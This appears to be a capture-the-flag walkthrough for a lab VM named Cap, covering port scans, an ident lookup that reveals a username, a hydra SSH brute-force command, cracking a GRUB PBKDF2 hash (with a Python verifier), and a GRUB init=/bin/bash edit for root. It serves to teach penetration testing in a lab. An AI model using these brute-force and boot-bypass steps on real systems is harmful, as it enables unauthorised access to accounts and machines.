# Lab setup
Download: Cap
NAT, IP: 192.168.1.179
# Penetration process
# Initial information gathering
```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It w
```

```
┌──(root㉿kali)-[~]
└─# nmap -6 -p- -A fe80::20c:29ff:fe15:15d2%eth0
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 04:46 EDT
Nmap scan report for fe80::20c:29ff:fe15:15d2
Host is up (0.00055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
113/tcp open  ident?
```
The box is named Cap, a hint to capture traffic, so open Wireshark and connect to port 113: `ncat -6 fe80::20c:29ff:fe15:15d2%eth0 113`
Note the local port of the connection shown there, then send `113,<local port>` (the ident query: server port, client port).
This returns the username lucas.
Brute-force the password: `hydra -l lucas -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.179 -I -t 64`
Password obtained: capricorn
Further enumeration turns up the file /boot/grub/grub.cfg, which contains a hash; crack it:
grub.pbkdf2.sha512.10000.E9DF42546DD8E4FA1D59A023BF0E3D9C83FFE8F0C1DE14FB88BCCCBBE5BD8FA7DAF1A9AC25593A43E094F8F00E8D0CDF81F066993234AC53DF5EE59BDD288E82.85C7A1032D4FA7D74E645A13DEBE367CFBF5A3AE7B1378D99BC2D00FF9EF8187F602865B972B538BC1678E17EEFE7A27C80AC1DD96D906FC1FBA5079779F163E
john cracks it to: starwars
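To make clear what john is actually working on here, the following is an added example (not part of the original writeup): it parses the `grub.pbkdf2.sha512.<iterations>.<salt>.<digest>` format that `grub-mkpasswd-pbkdf2` writes into grub.cfg, recomputes PBKDF2-HMAC-SHA512 with the stored salt and iteration count, and compares. The hash constant is the one from the writeup above; the function names are my own.

```python
import hashlib
import hmac
import os

# GRUB hash as found in /boot/grub/grub.cfg on the target (copied from the writeup).
PAGE_HASH = (
    "grub.pbkdf2.sha512.10000."
    "E9DF42546DD8E4FA1D59A023BF0E3D9C83FFE8F0C1DE14FB88BCCCBBE5BD8FA7"
    "DAF1A9AC25593A43E094F8F00E8D0CDF81F066993234AC53DF5EE59BDD288E82."
    "85C7A1032D4FA7D74E645A13DEBE367CFBF5A3AE7B1378D99BC2D00FF9EF8187"
    "F602865B972B538BC1678E17EEFE7A27C80AC1DD96D906FC1FBA5079779F163E"
)


def parse_grub_hash(s):
    """Split 'grub.pbkdf2.sha512.<iters>.<salt hex>.<digest hex>' into (iters, salt, digest)."""
    parts = s.strip().split(".")
    if len(parts) != 6 or parts[:3] != ["grub", "pbkdf2", "sha512"]:
        raise ValueError("not a grub.pbkdf2.sha512 hash")
    return int(parts[3]), bytes.fromhex(parts[4]), bytes.fromhex(parts[5])


def make_grub_hash(password, salt=None, iterations=10000):
    """Produce the same format grub-mkpasswd-pbkdf2 emits by default: 64-byte salt, 64-byte digest."""
    if salt is None:
        salt = os.urandom(64)
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations, dklen=64)
    return "grub.pbkdf2.sha512.%d.%s.%s" % (iterations, salt.hex().upper(), digest.hex().upper())


def verify_grub_hash(password, grub_hash):
    """Recompute PBKDF2-HMAC-SHA512 with the stored salt/iteration count and compare in constant time."""
    iterations, salt, expected = parse_grub_hash(grub_hash)
    candidate = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations, dklen=len(expected))
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    iters, salt, digest = parse_grub_hash(PAGE_HASH)
    print("iterations=%d salt=%d bytes digest=%d bytes" % (iters, len(salt), len(digest)))
    print("starwars verifies against the page hash:", verify_grub_hash("starwars", PAGE_HASH))
```

10000 rounds of PBKDF2 only slow guessing down, so a dictionary word like this one still falls quickly; note also that the GRUB password gates only the menu editor, and does not stop someone with console access who can boot other media, so full-disk encryption plus restricted physical/console access is the actual mitigation.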
It does not work for su, and ssh does not accept it either.
After reading a writeup, it turns out a reboot is required and then the GRUB edit mode has to be entered, which needs console (physical) access.
Enter edit mode with this password, then change ro to rw init=/bin/bash
F10 to save and boot, and that gives a root shell.
Change the password with passwd, and su works afterwards.